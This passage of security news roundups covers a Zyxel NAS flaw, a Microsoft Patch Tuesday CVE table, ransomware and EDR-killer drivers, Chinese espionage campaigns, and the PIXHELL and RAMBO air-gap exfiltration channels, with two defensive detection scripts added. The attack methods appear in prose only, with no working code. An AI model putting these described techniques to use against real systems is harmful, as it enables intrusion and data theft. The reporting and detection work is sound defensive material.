"A command injection vulnerability in the export-cgi program of Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request," the company said in an alert.
The security hole has been addressed in the below versions -
NAS326 (affects V5.21(AAZF.18)C0 and earlier) - Fixed in V5.21(AAZF.18)Hotfix-01
NAS542 (affects V5.21(ABAG.15)C0 and earlier) - Fixed in V5.21(ABAG.15)Hotfix-01
Microsoft September 2024 Patch Tuesday
Description / CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
---|---|---|---|---|---|---|---|
Azure CycleCloud Remote Code Execution Vulnerability | |||||||
CVE-2024-43469 | No | No | - | - | Important | 8.8 | 7.7 |
Azure Network Watcher VM Agent Elevation of Privilege Vulnerability | |||||||
CVE-2024-38188 | No | No | - | - | Important | 7.1 | 6.2 |
CVE-2024-43470 | No | No | - | - | Important | 7.3 | 6.4 |
Azure Stack Hub Elevation of Privilege Vulnerability | |||||||
CVE-2024-38216 | No | No | - | - | Critical | 8.2 | 7.1 |
CVE-2024-38220 | No | No | - | - | Critical | 9.0 | 7.8 |
Azure Web Apps Elevation of Privilege Vulnerability | |||||||
CVE-2024-38194 | No | No | - | - | Critical | 8.4 | 7.3 |
DHCP Server Service Denial of Service Vulnerability | |||||||
CVE-2024-38236 | No | No | - | - | Important | 7.5 | 6.5 |
Kernel Streaming Service Driver Elevation of Privilege Vulnerability | |||||||
CVE-2024-38241 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-38242 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-38238 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-38243 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-38244 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-38245 | No | No | - | - | Important | 7.8 | 6.8 |
Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability | |||||||
CVE-2024-38237 | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft AllJoyn API Information Disclosure Vulnerability | |||||||
CVE-2024-38257 | No | No | - | - | Important | 7.5 | 6.5 |
Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability | |||||||
CVE-2024-43492 | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | |||||||
CVE-2024-43476 | No | No | - | - | Important | 7.6 | 6.6 |
Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability | |||||||
CVE-2024-38225 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft Excel Elevation of Privilege Vulnerability | |||||||
CVE-2024-43465 | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Management Console Remote Code Execution Vulnerability | |||||||
CVE-2024-38259 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft Office Visio Remote Code Execution Vulnerability | |||||||
CVE-2024-43463 | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Outlook for iOS Information Disclosure Vulnerability | |||||||
CVE-2024-43482 | No | No | - | - | Important | 6.5 | 5.7 |
Microsoft Power Automate Desktop Remote Code Execution Vulnerability | |||||||
CVE-2024-43479 | No | No | - | - | Important | 8.5 | 7.4 |
Microsoft Publisher Security Feature Bypass Vulnerability | |||||||
CVE-2024-38226 | No | Yes | - | - | Important | 7.3 | 6.4 |
Microsoft SQL Server Elevation of Privilege Vulnerability | |||||||
CVE-2024-37965 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-37341 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-37980 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft SQL Server Information Disclosure Vulnerability | |||||||
CVE-2024-43474 | No | No | - | - | Important | 7.6 | 6.6 |
Microsoft SQL Server Native Scoring Information Disclosure Vulnerability | |||||||
CVE-2024-37966 | No | No | - | - | Important | 7.1 | 6.2 |
CVE-2024-37337 | No | No | - | - | Important | 7.1 | 6.2 |
CVE-2024-37342 | No | No | - | - | Important | 7.1 | 6.2 |
Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability | |||||||
CVE-2024-37338 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-37335 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-37340 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-37339 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-26186 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-26191 | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft SharePoint Server Denial of Service Vulnerability | |||||||
CVE-2024-43466 | No | No | - | - | Important | 6.5 | 5.7 |
Microsoft SharePoint Server Remote Code Execution Vulnerability | |||||||
CVE-2024-38018 | No | No | - | - | Critical | 8.8 | 7.7 |
CVE-2024-43464 | No | No | - | - | Critical | 7.2 | 6.3 |
CVE-2024-38227 | No | No | - | - | Important | 7.2 | 6.3 |
CVE-2024-38228 | No | No | - | - | Important | 7.2 | 6.3 |
Microsoft Windows Admin Center Information Disclosure Vulnerability | |||||||
CVE-2024-43475 | No | No | - | - | Important | 7.3 | 6.4 |
Microsoft Windows Update Remote Code Execution Vulnerability | |||||||
CVE-2024-43491 | No | Yes | - | - | Critical | 9.8 | 8.5 |
PowerShell Elevation of Privilege Vulnerability | |||||||
CVE-2024-38046 | No | No | - | - | Important | 7.8 | 6.8 |
Win32k Elevation of Privilege Vulnerability | |||||||
CVE-2024-38246 | No | No | - | - | Important | 7.0 | 6.1 |
Windows Authentication Information Disclosure Vulnerability | |||||||
CVE-2024-38254 | No | No | - | - | Important | 5.5 | 4.8 |
Windows Graphics Component Elevation of Privilege Vulnerability | |||||||
CVE-2024-38249 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-38250 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-38247 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Hyper-V Denial of Service Vulnerability | |||||||
CVE-2024-38235 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Installer Elevation of Privilege Vulnerability | |||||||
CVE-2024-38014 | No | Yes | - | - | Important | 7.8 | 6.8 |
Windows Kerberos Elevation of Privilege Vulnerability | |||||||
CVE-2024-38239 | No | No | - | - | Important | 7.2 | 6.3 |
Windows Kernel-Mode Driver Information Disclosure Vulnerability | |||||||
CVE-2024-38256 | No | No | - | - | Important | 5.5 | 4.8 |
Windows MSHTML Platform Spoofing Vulnerability | |||||||
CVE-2024-43461 | No | No | - | - | Important | 8.8 | 7.7 |
Windows Mark of the Web Security Feature Bypass Vulnerability | |||||||
CVE-2024-38217 | Yes | Yes | - | - | Important | 5.4 | 5.0 |
CVE-2024-43487 | No | No | - | - | Moderate | 6.5 | 6.0 |
Windows Network Address Translation (NAT) Remote Code Execution Vulnerability | |||||||
CVE-2024-38119 | No | No | - | - | Critical | 7.5 | 6.5 |
Windows Networking Denial of Service Vulnerability | |||||||
CVE-2024-38232 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-38233 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-38234 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Networking Information Disclosure Vulnerability | |||||||
CVE-2024-43458 | No | No | - | - | Important | 7.7 | 6.7 |
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | |||||||
CVE-2024-38240 | No | No | - | - | Important | 8.1 | 7.1 |
Windows Remote Desktop Licensing Service Denial of Service Vulnerability | |||||||
CVE-2024-38231 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Remote Desktop Licensing Service Information Disclosure Vulnerability | |||||||
CVE-2024-38258 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability | |||||||
CVE-2024-43467 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-38260 | No | No | - | - | Important | 8.8 | 7.7 |
CVE-2024-38263 | No | No | - | - | Important | 7.5 | 6.5 |
CVE-2024-43454 | No | No | - | - | Important | 7.1 | 6.2 |
Windows Remote Desktop Licensing Service Spoofing Vulnerability | |||||||
CVE-2024-43455 | No | No | - | - | Important | 8.8 | 7.7 |
Windows Security Zone Mapping Security Feature Bypass Vulnerability | |||||||
CVE-2024-30073 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Setup and Deployment Elevation of Privilege Vulnerability | |||||||
CVE-2024-43457 | No | No | - | - | Important | 7.8 | 6.8 |
Windows Standards-Based Storage Management Service Denial of Service Vulnerability | |||||||
CVE-2024-38230 | No | No | - | - | Important | 6.5 | 5.7 |
Windows Storage Elevation of Privilege Vulnerability | |||||||
CVE-2024-38248 | No | No | - | - | Important | 7.0 | 6.3 |
Windows TCP/IP Remote Code Execution Vulnerability | |||||||
CVE-2024-21416 | No | No | - | - | Important | 8.1 | 7.1 |
CVE-2024-38045 | No | No | - | - | Important | 8.1 | 7.1 |
Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | |||||||
CVE-2024-38252 | No | No | - | - | Important | 7.8 | 6.8 |
CVE-2024-38253 | No | No | - | - | Important | 7.8 | 6.8 |
Windows libarchive Remote Code Execution Vulnerability | |||||||
CVE-2024-43495 | No | No | - | - | Important | 7.3 | 6.4 |
Vulnerabilities: 79
CosmicBeetle Deploys Custom ScRansom Ransomware, Partnering with RansomHub
11.9.24 Ransom The Hacker News
The threat actor known as CosmicBeetle has debuted a new custom ransomware strain called ScRansom in attacks targeting small- and medium-sized businesses (SMBs) in Europe, Asia, Africa, and South America, while also likely working as an affiliate for RansomHub.
"CosmicBeetle replaced its previously deployed ransomware, Scarab, with ScRansom, which is continually improved," ESET researcher Jakub Souček said in a new analysis published today. "While not being top notch, the threat actor is able to compromise interesting targets."
Targets of ScRansom attacks span manufacturing, pharmaceuticals, legal, education, healthcare, technology, hospitality, leisure, financial services, and regional government sectors.
CosmicBeetle is best known for a malicious toolset called Spacecolon, previously used to deliver the Scarab ransomware to victim organizations worldwide.
Also known as NONAME, the adversary has experimented with the leaked LockBit builder since at least November 2023, using it to pass itself off as the infamous ransomware gang in its ransom notes and on its leak site.
Who is behind the attacks, and where they operate from, remains unclear. An earlier hypothesis pointed to a Turkish origin because of a custom encryption scheme found in another of the group's tools, ScHackTool, but ESET now believes that attribution no longer holds.
"ScHackTool's encryption scheme is used in the legitimate Disk Monitor Gadget," Souček pointed out. "It is likely that this algorithm was adapted [from a Stack Overflow thread] by VOVSOFT [the Turkish software firm behind the tool] and, years later, CosmicBeetle stumbled upon it and used it for ScHackTool."
Attack chains have been observed combining brute-force attacks with known security flaws to infiltrate target environments: CVE-2017-0144 (EternalBlue, SMBv1), CVE-2020-1472 (Zerologon, Netlogon), CVE-2021-42278 and CVE-2021-42287 (Active Directory sAMAccountName spoofing, aka noPac), CVE-2022-42475 (FortiOS SSL-VPN), and CVE-2023-27532 (Veeam Backup & Replication).
The intrusions also involve tools such as Reaper, Darkside, and RealBlindingEDR to terminate security-related processes and sidestep detection before the Delphi-based ScRansom ransomware is deployed. ScRansom supports partial encryption to speed up the process and an "ERASE" mode that overwrites files with a constant value, rendering them unrecoverable.
The connection to RansomHub stems from the fact that the Slovak cybersecurity company spotted the deployment of ScRansom and RansomHub payloads on the same machine within a week's time.
"Probably due to the obstacles that writing custom ransomware from scratch brings, CosmicBeetle attempted to leech off LockBit's reputation, possibly to mask the issues in the underlying ransomware and in turn to increase the chance that victims will pay," Souček said.
Cicada3301 Unleashes Updated Version
The disclosure comes as threat actors linked to the Cicada3301 ransomware (aka Repellent Scorpius) have been observed using an updated version of the encryptor since July 2024.
"Threat authors added a new command-line argument, --no-note," Palo Alto Networks Unit 42 said in a report shared with The Hacker News. "When this argument is invoked, the encryptor will not write the ransom note to the system."
Another notable change is that the binary no longer carries hard-coded usernames or passwords, although it retains the ability to run PsExec with such credentials when they are supplied, a technique Morphisec highlighted recently.
In an interesting twist, the cybersecurity vendor said it observed signs that the group has data obtained from older compromise incidents that predate the group's operation under the Cicada3301 brand.
This has raised the possibility that the threat actor previously operated under a different ransomware brand, or purchased the data from other ransomware groups. That said, Unit 42 noted it identified some overlaps with another attack carried out by an affiliate that deployed BlackCat ransomware in March 2022.
BURNTCIGAR Becomes an EDR Wiper
The findings also follow the evolution of a signed kernel-mode Windows driver used by multiple ransomware gangs to turn off Endpoint Detection and Response (EDR) software: it can now act as a wiper that deletes critical components of those products from disk, rather than merely terminating their processes.
The malware in question is POORTRY, a driver that a loader named STONESTOP brings onto the system in Bring Your Own Vulnerable Driver (BYOVD) fashion; because the driver carries a valid-looking code signature, it passes Driver Signature Enforcement and loads into the kernel. Its ability to "force delete" files on disk was first noted by Trend Micro in May 2023.
POORTRY, detected as far back as 2021, is also referred to as BURNTCIGAR, and has been used by multiple ransomware gangs over the years, including CUBA, BlackCat, Medusa, LockBit, and RansomHub.
"Both the Stonestop executable and the Poortry driver are heavily packed and obfuscated," Sophos said in a recent report. "This loader was obfuscated by a closed-source packer named ASMGuard, available on GitHub."
POORTRY is "focused on disabling EDR products through a series of different techniques, such as removal or modification of kernel notify routines. The EDR killer aims at terminating security-related processes and rendering the EDR agent useless by wiping critical files off disk."
The rogue drivers take advantage of what the company described as a "virtually limitless supply of stolen or improperly used code signing certificates" in order to bypass Microsoft's Driver Signature Verification protections.
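The defensive counterpart to the technique described above is to look at every kernel driver load and ask whether the signature, the signer, the hash, or the load path makes sense. The following is an added example written for this page, not code from Sophos or Trend Micro. It triages records shaped like Sysmon Event ID 6 ("Driver loaded"): the field names (ImageLoaded, Hashes, Signed, Signature, SignatureStatus) are the real Event 6 fields, but the tab-separated key=value layout, the sample records, and every hash and signer in the deny-lists are constructed placeholders rather than real indicators.

```python
"""Triage of Sysmon Event ID 6 ("Driver loaded") records for BYOVD-style
EDR-killer activity. Added example for this page, not Sophos's or Trend
Micro's code. The field names are the real Event 6 fields; the record
layout, sample events and deny-list entries are constructed placeholders."""
import re
from dataclasses import dataclass

# Placeholder deny-lists (assumed, not real IOCs): hashes of known
# vulnerable/abused drivers and certificate subjects seen signing them.
KNOWN_BAD_SHA256 = {"0" * 63 + "1"}
KNOWN_ABUSED_SIGNERS = {"Example Stolen Cert Holder Ltd"}

# Legitimate drivers live under System32\drivers; loads from user profiles,
# ProgramData or Temp are the staging pattern a BYOVD loader leaves behind.
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\",)


@dataclass
class DriverLoad:
    image: str
    sha256: str
    signed: bool
    signature: str
    status: str


def parse_event6(line: str) -> DriverLoad:
    """Parse one tab-separated key=value record (constructed layout)."""
    fields = dict(re.findall(r"(\w+)=([^\t]*)", line))
    hashes = dict(
        h.split("=", 1) for h in fields.get("Hashes", "").split(",") if "=" in h
    )
    return DriverLoad(
        image=fields.get("ImageLoaded", ""),
        sha256=hashes.get("SHA256", "").lower(),
        signed=fields.get("Signed", "false").lower() == "true",
        signature=fields.get("Signature", ""),
        status=fields.get("SignatureStatus", ""),
    )


def triage(load: DriverLoad) -> list:
    """Return the reasons a driver load deserves a look (empty = benign)."""
    reasons = []
    if not load.signed:
        reasons.append("unsigned driver")
    elif load.status.lower() != "valid":
        # A revoked or expired certificate is what a stolen or leaked
        # signing certificate looks like once the CA has acted on it.
        reasons.append(f"signature status {load.status!r}")
    if load.signature in KNOWN_ABUSED_SIGNERS:
        reasons.append("signer on abused-certificate list")
    if load.sha256 in KNOWN_BAD_SHA256:
        reasons.append("hash on vulnerable/abused driver list")
    if not load.image.lower().startswith(TRUSTED_DRIVER_DIRS):
        reasons.append("loaded from outside System32\\drivers")
    return reasons


def scan(lines) -> dict:
    """Map each suspicious driver path to its list of reasons."""
    hits = {}
    for line in lines:
        if line.strip():
            load = parse_event6(line)
            reasons = triage(load)
            if reasons:
                hits[load.image] = reasons
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    "\t".join(["ImageLoaded=C:\\Windows\\System32\\drivers\\tcpip.sys",
               "Hashes=SHA256=AAAA", "Signed=true",
               "Signature=Microsoft Windows", "SignatureStatus=Valid"]),
    "\t".join(["ImageLoaded=C:\\Users\\Public\\svchost.sys",
               "Hashes=SHA256=" + "0" * 63 + "1", "Signed=true",
               "Signature=Example Stolen Cert Holder Ltd",
               "SignatureStatus=Revoked"]),
    "\t".join(["ImageLoaded=C:\\Windows\\Temp\\drv.sys",
               "Hashes=SHA256=BBBB", "Signed=false",
               "Signature=", "SignatureStatus=Unavailable"]),
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS).items():
        print(image, "->", "; ".join(reasons))
```

The signature-status check matters more than the hash list: a driver signed with a stolen certificate has a perfectly valid-looking signature until the certificate is revoked, so hash and path rules are what catch a fresh build, and the status rule catches the older ones once revocation lands.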
The use of an improved version of POORTRY by RansomHub is notable given that the ransomware crew has also been observed using another EDR-killer tool, dubbed EDRKillShifter, this year.
That's not all. The ransomware group has also been detected utilizing a legitimate tool from Kaspersky called TDSSKiller to disarm EDR services on target systems, indicating that the threat actors are incorporating several programs with similar functionality in their attacks.
"It's important to recognize that threat actors have been consistently experimenting with different methods to disable EDR products — a trend we've been observing since at least 2022," Sophos told The Hacker News. "This experimentation can involve various tactics, such as exploiting vulnerable drivers or using certificates that have been unintentionally leaked or obtained through illegal means."
"While it might seem like there's a significant increase in these activities, it's more accurate to say that this is part of an ongoing process rather than a sudden rise."
"The use of different EDR-killer tools, such as EDRKillShifter by groups like RansomHub, likely reflects this ongoing experimentation. It's also possible that different affiliates are involved, which could explain the use of varied methods, though without specific information, we wouldn't want to speculate too much on that point."
Experts Identify 3 Chinese-Linked Clusters Behind Cyberattacks in Southeast Asia
11.9.24 APT The Hacker News
A trio of threat activity clusters linked to China has been observed compromising more government organizations in Southeast Asia as part of a renewed state-sponsored operation codenamed Crimson Palace, indicating an expansion in the scope of the espionage effort.
Cybersecurity firm Sophos, which has been monitoring the cyber offensive, said it comprises three intrusion sets tracked as Cluster Alpha (STAC1248), Cluster Bravo (STAC1870), and Cluster Charlie (STAC1305). STAC is an abbreviation for "security threat activity cluster."
"The attackers consistently used other compromised organizational and public service networks in that region to deliver malware and tools under the guise of a trusted access point," security researchers Mark Parsons, Morgan Demboski, and Sean Gallagher said in a technical report shared with The Hacker News.
A noteworthy aspect of the attacks is that they entail the use of an unnamed organization's systems as a command-and-control (C2) relay point and a staging ground for tools. A second organization's compromised Microsoft Exchange Server is said to have been used to host malware.
Crimson Palace was first documented by the cybersecurity company in early June 2024, with the attacks taking place between March 2023 and April 2024.
While initial activity associated with Cluster Bravo, which overlaps with a threat group called Unfading Sea Haze, was confined to March 2023, a new attack wave detected between January and June 2024 has been observed targeting 11 other organizations and agencies in the same region.
A set of new attacks orchestrated by Cluster Charlie, a cluster that's referred to as Earth Longzhi, has also been identified between September 2023 and June 2024, some of which also involve the deployment of different C2 frameworks like Cobalt Strike, Havoc, and XieBroC2 in order to facilitate post-exploitation and deliver additional payloads like SharpHound for Active Directory infrastructure mapping.
"Exfiltration of data of intelligence value was still an objective after the resumption of activity," the researchers said. "However, much of their effort appeared to be focused on re-establishing and extending their foothold on the target network by bypassing EDR software and rapidly re-establishing access when their C2 implants had been blocked."
Another significant aspect is Cluster Charlie's heavy reliance on DLL hijacking to execute malware, an approach previously adopted by threat actors behind Cluster Alpha, indicating a "cross-pollination" of tactics.
Some of the other open-source programs used by the threat actor include RealBlindingEDR and Alcatraz, which allow for terminating antivirus processes and obfuscating portable executable files (e.g., .exe, .dll, and .sys) with an aim to fly under the radar.
Rounding off the cluster's malware arsenal is a previously unknown keylogger codenamed TattleTale that was originally identified in August 2023 and is capable of collecting Google Chrome and Microsoft Edge browser data.
"The malware can fingerprint the compromised system and check for mounted physical and network drives by impersonating a logged-on user," the researchers explained.
"TattleTale also collects the domain controller name and steals the LSA (Local Security Authority) Query Information Policy, which is known to contain sensitive information related to password policies, security settings, and sometimes cached passwords."
In a nutshell, the three clusters work hand in hand, while simultaneously focusing on specific tasks in the attack chain: Infiltrating target environments and conducting reconnaissance (Alpha), burrowing deep into the networks using various C2 mechanisms (Bravo), and exfiltrating valuable data (Charlie).
"Throughout the engagement, the adversary appeared to continually test and refine their techniques, tools, and practices," the researchers concluded. "As we deployed countermeasures for their bespoke malware, they combined the use of their custom-developed tools with generic, open-source tools often used by legitimate penetration testers, testing different combinations."
New PIXHELL Attack Exploits LCD Screen Noise to Exfiltrate Data from Air-Gapped Computers
11.9.24 Attack The Hacker News
A new side-channel attack dubbed PIXHELL could be abused to target air-gapped computers by breaching the "audio gap" and exfiltrating sensitive information by taking advantage of the noise generated by pixels on an LCD screen.
"Malware in the air-gap and audio-gap computers generates crafted pixel patterns that produce noise in the frequency range of 0 - 22 kHz," Dr. Mordechai Guri, the head of the Offensive Cyber Research Lab in the Department of Software and Information Systems Engineering at the Ben Gurion University of the Negev in Israel, said in a newly published paper.
"The malicious code exploits the sound generated by coils and capacitors to control the frequencies emanating from the screen. Acoustic signals can encode and transmit sensitive information."
The attack is notable in that it doesn't require any specialized audio hardware, loudspeaker, or internal speaker on the compromised computer, instead relying on the LCD screen to generate acoustic signals.
Air-gapping is a crucial security measure designed to safeguard mission-critical environments against potential security threats by physically and logically isolating them from external networks (i.e., the internet). This is typically accomplished by disconnecting network cables, disabling wireless interfaces, and disabling USB connections.
That said, such defenses can be circumvented by a rogue insider or by a compromise of the hardware or software supply chain. Another scenario involves an unsuspecting employee plugging in an infected USB drive, deploying malware capable of opening a covert data exfiltration channel.
"Phishing, malicious insiders, or other social engineering techniques may be employed to trick individuals with access to the air-gapped system into taking actions that compromise security, such as clicking on malicious links or downloading infected files," Dr. Guri said.
"Attackers may also use software supply chain attacks by targeting software application dependencies or third-party libraries. By compromising these dependencies, they can introduce vulnerabilities or malicious code that may go unnoticed during development and testing."
Like the recently demonstrated RAMBO attack, PIXHELL makes use of the malware deployed on the compromised host to create an acoustic channel for leaking information from audio-gapped systems.
This is made possible by the fact that LCD screens contain inductors and capacitors in their internal circuitry and power supply; when current passes through the coils they vibrate at audible frequencies and produce a high-pitched noise, a phenomenon known as coil whine.
Specifically, changes in power consumption can induce mechanical vibrations or piezoelectric effects in capacitors, producing audible noise. A crucial aspect that affects the consumption pattern is the number of pixels that are lit and their distribution across the screen, as white pixels require more power to display than dark pixels.
"Also, when alternating current (AC) passes through the screen capacitors, they vibrate at specific frequencies," Dr. Guri said. "The acoustic emanates are generated by the internal electric part of the LCD screen. Its characteristics are affected by the actual bitmap, pattern, and intensity of pixels projected on the screen."
"By carefully controlling the pixel patterns shown on our screen, our technique generates certain acoustic waves at specific frequencies from LCD screens."
An attacker could therefore use the technique to modulate exfiltrated data onto acoustic signals that are picked up by a nearby Windows or Android device, which demodulates the packets and extracts the information.
That said, it bears noting that the power and quality of the emitted acoustic signal depend on the specific screen structure, its internal power supply, and the coil and capacitor locations, among other factors.
Another important thing to highlight is that the PIXHELL attack, by default, is visible to users looking at the LCD screen, given that it involves displaying a bitmap pattern comprising alternate black-and-white rows.
"To remain covert, attackers may use a strategy that transmits while the user is absent," Dr. Guri said. "For example, a so-called 'overnight attack' on the covert channels is maintained during the off-hours, reducing the risk of being revealed and exposed."
The attack, however, could be transformed into a stealthy one during working hours by reducing the pixel colors to very low values prior to transmission -- i.e., using RGB levels of (1,1,1), (3,3,3), (7,7,7), and (15,15,15) -- thereby giving the impression to the user that the screen is black.
But doing so has the side effect of "significantly" bringing down the sound production levels. Nor is the approach foolproof, as a user can still make out anomalous patterns if they look "carefully" at the screen.
This is not the first time audio-gap restrictions have been surmounted in an experimental setup. Prior studies undertaken by Dr. Guri and others have employed sounds generated by computer fans (Fansmitter), hard disk drives (Diskfiltration), CD/DVD drives (CD-LEAK), power supply units (POWER-SUPPLaY), and inkjet printers (Inkfiltration).
As countermeasures, it's recommended to use an acoustic jammer to neutralize the transmission, monitor the audio spectrum for unusual or uncommon signals, limit physical access to authorized personnel, prohibit the use of smartphones, and use an external camera for detecting unusual modulated screen patterns.
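The "monitor the audio spectrum" countermeasure above comes down to watching a microphone feed for narrowband energy that should not be there. The following is an added example for this page, not code from the PIXHELL paper: it runs the Goertzel algorithm (a single-bin DFT that needs no FFT library) over a block of samples for a set of candidate frequencies across the 0-22 kHz band the paper uses, and flags any bin whose energy towers over the rest. The audio is synthesised inline for the example; the sample rate, block length, candidate spacing and detection ratio are assumptions that would need tuning for a real room and microphone.

```python
"""Narrowband tone detector for acoustic covert-channel monitoring. Added
example, not code from the PIXHELL paper. Sample rate, block size and
thresholds are assumed values; the audio is synthesised for the demo."""
import math
import random

SAMPLE_RATE = 44_100                           # Hz (assumed microphone rate)
BLOCK = 4_410                                  # 100 ms window -> 10 Hz bins
CANDIDATES = list(range(1_000, 22_000, 500))   # Hz, PIXHELL's 0-22 kHz band


def goertzel_power(samples, target_hz, fs=SAMPLE_RATE):
    """Energy of `samples` at `target_hz`: one DFT bin in O(N), no FFT needed."""
    n = len(samples)
    k = round(n * target_hz / fs)              # nearest bin index
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def detect_tones(samples, candidates=CANDIDATES, ratio=20.0, floor=1.0):
    """Frequencies whose energy exceeds `ratio` x the median candidate energy.
    A modulated carrier shows up as one or a few bins standing far above a
    flat noise floor; `floor` stops near-silence from raising alerts."""
    powers = {f: goertzel_power(samples, f) for f in candidates}
    ordered = sorted(powers.values())
    median = ordered[len(ordered) // 2]
    threshold = max(ratio * median, floor)
    return sorted(f for f, p in powers.items() if p > threshold)


def synth_audio(tone_hz=None, amp=0.3, n=BLOCK, fs=SAMPLE_RATE, seed=1):
    """Constructed test audio: low-level uniform noise plus an optional sine
    (a stand-in for a screen's coil whine carrier)."""
    rng = random.Random(seed)
    out = []
    for i in range(n):
        v = rng.uniform(-0.05, 0.05)
        if tone_hz:
            v += amp * math.sin(2.0 * math.pi * tone_hz * i / fs)
        out.append(v)
    return out


if __name__ == "__main__":
    print("carrier present:", detect_tones(synth_audio(17_500)))
    print("noise only:", detect_tones(synth_audio()))
```

Goertzel is used here because a monitoring agent only needs a handful of bins, not a full spectrum, and it runs comfortably on a small device parked next to the air-gapped workstation. A real deployment would keep a per-frequency baseline over hours (fans and HVAC are also narrowband) and alert on new peaks rather than on absolute energy.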
Mustang Panda Deploys Advanced Malware to Spy on Asia-Pacific Governments
11.9.24 APT The Hacker News
The threat actor tracked as Mustang Panda has refined its malware arsenal to include new tools in order to facilitate data exfiltration and the deployment of next-stage payloads, according to new findings from Trend Micro.
The cybersecurity firm, which is monitoring the activity cluster under the name Earth Preta, said it observed "the propagation of PUBLOAD via a variant of the worm HIUPAN."
PUBLOAD is a known downloader malware linked to Mustang Panda since early 2022, deployed as part of cyber attacks targeting government entities in the Asia-Pacific (APAC) region to deliver the PlugX malware.
"PUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP to serve as a secondary control tool, which was observed to perform similar tasks as that of PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option," security researchers Lenart Bermejo, Sunny Lu, and Ted Lee said.
Mustang Panda's use of removable drives as a propagation vector for HIUPAN was previously documented by Trend Micro in March 2023. It's tracked by Google-owned Mandiant as MISTCLOAK, which it observed in connection with a cyber espionage campaign targeting the Philippines that may have commenced as far back as September 2021.
PUBLOAD is equipped with features to conduct reconnaissance of the infected network and harvest files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx), while also serving as a conduit for a new hacking tool dubbed FDMTP, which is a "simple malware downloader" implemented based on TouchSocket over Duplex Message Transport Protocol (DMTP).
The captured information is compressed into a RAR archive and exfiltrated to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been observed deploying a custom program named PTSOCKET that can transfer files in multi-threaded mode.
Furthermore, Trend Micro has attributed the adversary to a "fast-paced" spear-phishing campaign that it detected in June 2024 as distributing email messages containing a .url attachment, which, when launched, is used to deliver a signed downloader dubbed DOWNBAIT.
The campaign is believed to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan based on the filenames and content of the decoy documents used.
DOWNBAIT is a first-stage loader tool that's used to retrieve and execute the PULLBAIT shellcode in memory, which subsequently downloads and runs the first-stage backdoor referred to as CBROVER.
The implant, for its part, supports file download and remote shell execution capabilities, alongside acting as a delivery vehicle for the PlugX remote access trojan (RAT). PlugX then takes care of deploying another bespoke file collector called FILESAC that can collect the victim's files.
The disclosure comes as Palo Alto Networks Unit 42 detailed Mustang Panda's abuse of Visual Studio Code's embedded reverse shell feature to gain a foothold in target networks, indicating that the threat actor is actively tweaking its modus operandi.
"Earth Preta has shown significant advancements in their malware deployment and strategies, particularly in their campaigns targeting government entities," the researchers said. "The group has evolved their tactics, [...] leveraging multi-stage downloaders (from DOWNBAIT to PlugX) and possibly exploiting Microsoft's cloud services for data exfiltration."
New RAMBO Attack Uses RAM Radio Signals to Steal Data from Air-Gapped Networks
11.9.24 Attack The Hacker News
A novel side-channel attack has been found to leverage radio signals emitted by a device's random access memory (RAM) as a data exfiltration mechanism, posing a threat to air-gapped networks.
The technique has been codenamed RAMBO (short for "Radiation of Air-gapped Memory Bus for Offense") by Dr. Mordechai Guri, the head of the Offensive Cyber Research Lab in the Department of Software and Information Systems Engineering at the Ben Gurion University of the Negev in Israel.
"Using software-generated radio signals, malware can encode sensitive information such as files, images, keylogging, biometric information, and encryption keys," Dr. Guri said in a newly published research paper.
"With software-defined radio (SDR) hardware, and a simple off-the-shelf antenna, an attacker can intercept transmitted raw radio signals from a distance. The signals can then be decoded and translated back into binary information."
